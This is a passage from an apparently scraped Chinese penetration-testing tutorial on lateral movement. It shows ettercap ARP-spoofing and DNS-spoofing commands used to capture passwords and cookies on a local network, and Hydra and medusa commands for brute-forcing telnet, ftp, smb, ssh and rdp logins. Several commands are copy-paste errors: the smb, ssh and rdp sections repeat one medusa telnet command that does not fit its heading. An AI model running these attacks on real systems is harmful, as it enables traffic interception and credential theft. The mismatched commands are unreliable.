渗透测试干货 | 横向渗透的常见方法( 三 )
ettercap -G
文章插图
③设置插件plugins》manage plugins》dns_spoof
文章插图
④dns欺骗这里也可以看到记录的密码
文章插图
⑤dns欺骗成功
文章插图
ettercap命令行
ettercap -T -q -i eth0 -M arp:remote /192.168.198.130// /192.168.198.2//#目标:192.168.198.130#网关:192.168.198.2抓取密码成功 , 这里还能抓到cookie , 如果没法抓到密码可以抓cookie登录
文章插图
四、服务密码攻击1.在线爆破在线爆破受网络因素、字典、电脑性能影响较大 。 扫描端口分析服务进行爆破攻击:smb、telnet、ftp、rdp、mysql、mssql、sshHydra爆破telnet
hydra -L /root/dict/usename.txt -P /root/dict/password.txt -t 20 telnet://192.168.198.133:23
文章插图
Hydra爆破ftp
hydra -L /root/dict/usename.txt -P /root/dict/password.txt -t 20 ftp://192.168.198.133:21
文章插图
Hydra爆破smb
medusa -h 192.168.1.8 -U /root/dict/usename.txt -P /root/dict/password.txt -M telnet
文章插图Hydra爆破ssh
medusa -h 192.168.1.8 -U /root/dict/usename.txt -P /root/dict/password.txt -M telnet
文章插图Hydra爆破rdp 。 存在误报情况 , 未知原因:
medusa -h 192.168.1.8 -U /root/dict/usename.txt -P /root/dict/password.txt -M telnet
文章插图medusamedusa 工具是通过并行登录暴力破解的方法 , 尝试获取远程验证服务访问权限 。 medusa能够验证的远程服务 , 如ftp/http/imap/mssql/netware/nntp/pcanywhere/pop3/snmp/sshv2/telnet/vnc 等服务密码 。 个人觉得没有hydra用起来丝滑
medusa -h 192.168.1.8 -U /root/dict/usename.txt -P /root/dict/password.txt -M telnet
文章插图其他–超级弱口令工具
线程越低越精确
文章插图2.离线爆破
推荐阅读
- 极速鲨课堂85:显卡怎么测试 3DMARK详解
- 测试|自动驾驶车辆将在深圳19个公开区域路测
- iPhone折叠屏要来?两种设计通过初步测试
- 曝富士康正为苹果测试折叠iPhone原型机
- 喵博士资讯 | 西安奥体中心建成国内首个5G场馆;苹果被曝已开始在工厂测试折叠屏iPhone
- 可折叠iPhone原型机已在富士康工厂成功经过测试
- 折叠屏iPhone要来了 曝富士康正在测试
- Fedora正在寻求协助 希望加快Linux 5.10 LTS内核测试进度
- 从i7-1185G7测试 谈十一代酷睿性能提升之根本
- 消息称已有2款折叠式iPhone通过内部耐用性测试